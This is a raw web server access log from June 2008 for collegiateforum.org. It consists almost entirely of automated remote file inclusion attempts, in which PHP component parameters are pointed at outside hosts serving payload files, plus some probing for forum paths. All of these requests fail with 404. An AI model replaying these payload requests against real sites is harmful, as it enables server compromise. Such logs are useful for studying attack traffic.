209.62.24.242 - - [01/Jun/2008:18:06:14 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
209.62.24.242 - - [01/Jun/2008:18:06:14 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://purukcahu.sitesled.com/newbot/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
168.209.97.34 - - [01/Jun/2008:18:06:29 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.collegiateforum.org"
168.209.97.34 - - [01/Jun/2008:18:06:29 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/sofialia76/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:06:41 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
64.202.117.159 - - [01/Jun/2008:18:06:42 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.202.117.159 - - [01/Jun/2008:18:06:42 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
64.202.117.159 - - [01/Jun/2008:18:06:42 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:06:46 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
195.12.53.176 - - [01/Jun/2008:18:06:53 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.collegiateforum.org"
195.12.53.176 - - [01/Jun/2008:18:06:53 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/adam.diaz61/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:06:56 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:06:59 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:18:07:04 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:07:06 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:18:07:12 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:07:14 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:07:15 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:07:15 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
91.193.143.7 - - [01/Jun/2008:18:07:31 -0700] "GET /logs/access_080324.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
91.193.143.7 - - [01/Jun/2008:18:07:31 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
91.193.143.7 - - [01/Jun/2008:18:07:32 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
196.41.124.8 - - [01/Jun/2008:18:07:43 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
196.41.124.8 - - [01/Jun/2008:18:07:43 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
196.41.124.8 - - [01/Jun/2008:18:07:44 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.47.201.117 - - [01/Jun/2008:18:07:48 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
72.47.201.117 - - [01/Jun/2008:18:07:48 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:07:56 -0700] "GET /logs/access_080107.log/modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:07:56 -0700] "GET /modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:07:57 -0700] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:18:07:58 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:18:07:58 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
194.85.89.204 - - [01/Jun/2008:18:08:14 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [01/Jun/2008:18:09:29 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [01/Jun/2008:18:09:30 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [01/Jun/2008:18:09:30 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:09:34 -0700] "GET /logs/access_080324.log/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:09:35 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
89.188.112.121 - - [01/Jun/2008:18:09:35 -0700] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.205 - - [01/Jun/2008:18:09:43 -0700] "GET /logs/access_080128.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.205 - - [01/Jun/2008:18:09:43 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.205 - - [01/Jun/2008:18:09:43 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.158.47.67 - - [01/Jun/2008:18:09:46 -0700] "GET /logs/access_080204.log/components/com_performs/performs.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
70.87.81.18 - - [01/Jun/2008:18:09:52 -0700] "GET /logs//nuboard_v0.5/admin/index.php?site=http://rom.as.ro/a//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
70.87.81.18 - - [01/Jun/2008:18:09:52 -0700] "GET //nuboard_v0.5/admin/index.php?site=http://rom.as.ro/a//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:18:09:56 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:18:09:58 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:18:10:07 -0700] "GET /logs/access.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
91.193.143.7 - - [01/Jun/2008:18:10:39 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [01/Jun/2008:18:10:41 -0700] "GET /logs/access_071231.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
196.41.124.8 - - [01/Jun/2008:18:10:44 -0700] "GET /logs/access_080204.log/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/maya.risa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.205 - - [01/Jun/2008:18:11:01 -0700] "GET /logs/access_071231.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:18:11:09 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:18:11:09 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
212.227.251.172 - - [01/Jun/2008:18:11:43 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
196.41.124.8 - - [01/Jun/2008:18:12:48 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
196.41.124.8 - - [01/Jun/2008:18:12:51 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.geocities.com/nialeva/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:18:12:59 -0700] "GET /logs/access_080324.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:18:12:59 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:18:12:59 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:13:09 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:13:09 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:13:09 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:13:09 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:13:09 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:18:13:10 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
207.7.108.240 - - [01/Jun/2008:18:13:57 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
207.7.108.240 - - [01/Jun/2008:18:13:58 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:18:14:01 -0700] "GET /logs/access_080324.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:18:14:01 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:18:14:01 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
87.106.37.86 - - [01/Jun/2008:18:14:47 -0700] "GET /logs/access.log//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.37.86 - - [01/Jun/2008:18:14:47 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.37.86 - - [01/Jun/2008:18:14:47 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:14:48 -0700] "GET /logs/access.log//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:14:49 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
190.54.28.163 - - [01/Jun/2008:18:14:49 -0700] "GET /logs/config.php?path_to_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:14:49 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
190.54.28.163 - - [01/Jun/2008:18:14:54 -0700] "GET /config.php?path_to_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:18:15:23 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.65.47.4 - - [01/Jun/2008:18:15:35 -0700] "GET /logs/access_080107.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:18:16:00 -0700] "GET /logs/access_080204.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:16:23 -0700] "GET /logs/access_080107.log/modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:16:24 -0700] "GET /modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.140.135.103 - - [01/Jun/2008:18:16:24 -0700] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://https-secure.com/estheticformula/cart/html/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.232.98.124 - - [01/Jun/2008:18:16:28 -0700] "GET / HTTP/1.0" 200 918 "http://collegiateforum.org/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "collegiateforum.org"
66.232.98.124 - - [01/Jun/2008:18:16:28 -0700] "GET /forum/index.php HTTP/1.0" 404 275 "http://collegiateforum.org/forum/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "collegiateforum.org"
66.232.98.124 - - [01/Jun/2008:18:16:28 -0700] "GET /phpbb/index.php HTTP/1.0" 404 275 "http://collegiateforum.org/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "collegiateforum.org"
66.232.98.124 - - [01/Jun/2008:18:16:29 -0700] "GET /phpbb2/index.php HTTP/1.0" 404 275 "http://collegiateforum.org/phpbb2/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "collegiateforum.org"
66.232.98.124 - - [01/Jun/2008:18:16:29 -0700] "GET /forums/index.php HTTP/1.0" 404 275 "http://collegiateforum.org/forums/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "collegiateforum.org"
66.232.98.124 - - [01/Jun/2008:18:16:29 -0700] "GET /board/index.php HTTP/1.0" 404 275 "http://collegiateforum.org/board/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "collegiateforum.org"
82.146.59.231 - - [01/Jun/2008:18:17:50 -0700] "GET /logs/access.log//admin/index.php?o=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [01/Jun/2008:18:20:25 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.232.196.106 - - [01/Jun/2008:18:20:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://amazu.de/.d/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:20:45 -0700] "GET /logs/access_080107.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:20:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:20:45 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.75.184.73 - - [01/Jun/2008:18:22:10 -0700] "GET /logs/access_080121.log/admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.73 - - [01/Jun/2008:18:22:10 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.73 - - [01/Jun/2008:18:22:10 -0700] "GET /logs/admincp/auth/checklogin.php?cfgProgDir=http://www.andygo.ru/cache/system/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.53.240.146 - - [01/Jun/2008:18:22:16 -0700] "GET /logs/access_080225.log//update/update5.php?lang=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [01/Jun/2008:18:22:16 -0700] "GET //update/update5.php?lang=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.53.240.146 - - [01/Jun/2008:18:22:16 -0700] "GET /logs//update/update5.php?lang=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
209.216.249.194 - - [01/Jun/2008:18:22:44 -0700] "GET /logs/access_071231.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
64.72.119.227 - - [01/Jun/2008:18:22:52 -0700] "GET /logs/access_071224.log//administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://piceadesign.co.uk/menu_bar/ons.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
